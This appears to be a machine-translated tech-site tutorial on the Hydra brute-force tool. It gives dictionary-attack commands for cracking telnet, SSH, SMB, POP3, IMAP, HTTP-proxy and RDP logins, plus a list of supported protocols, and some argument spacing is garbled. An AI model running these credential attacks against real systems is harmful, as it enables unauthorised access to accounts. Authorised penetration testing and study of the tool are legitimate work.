In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article mainly introduces how to use the Hydra brute force cracking tool, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.
For reference, study and use only
1 crack the login account and password of telnet service
Use the command: hydra 192.168.43.133-l telnet-P p.txt telnet
Command explanation: the host IP is 192.168.43.133, specify the login account in lowercase-l, specify the file for account cracking in uppercase-L, specify the password dictionary to be cracked in uppercase-P, and specify the specific password if the lowercase-p parameter is used. The account is cracked. It's telnet, and the password is telnet. You can also use the-o parameter to specify that the result of the crack is written to a file.
2 crack the login account and password of ssh service
Use the command: hydra 127.0.0.1-l root-P p.txt ssh
Command explanation: crack the ssh login account and password of this machine. The account number is specified as root, and the password is carried out in a dictionary.
3 crack the login account and password of smb service
Use the command: hydra 127.0.0.1-l root-P p.txt smb
4 crack the login account and password of pop3 service
Use the command: hydra-l root-P p.txt my.pop3.mail pop3
5 crack the login account and password of imap service
Use the command: hydra-l root-P p.txt 192.168.1.30 imap
6 crack the login account and password of http-proxy service
Use the command: hydra-l root-P p.txt http-proxy://192.168.1.20
7 crack the login account and password of RDP service
Use the command: hydra-l root-P p.txt 192.168.1.30 rdp
8 attachment-hydra supports cracked protocols
Hydra mainly supports cracking the login accounts and passwords of the following protocols:
Supported services: asterisk cisco cisco-enablecvs firebird ftp ftps http [s]-{head | get} http [s]-{get | post}-form http-proxyhttp-proxy-urlenum icq imap [s] irc ldap2 [s] ldap3 [- {cram | digest} md5] [s] mssqlmysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdpredis rexec rlogin rsh S7-300 sip smb smtp [s] smtp-enum snmp socks5 ssh sshkeyteamspeak telnet [s] vmauthd vnc xmpp
Thank you for reading this article carefully. I hope the article "how to use Hydra brute Force cracking tools" shared by the editor will be helpful to everyone. At the same time, I also hope you can support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
Curl http://43.254.0.226/GetIP/getip.php
© 2024 shulou.com SLNews company. All rights reserved.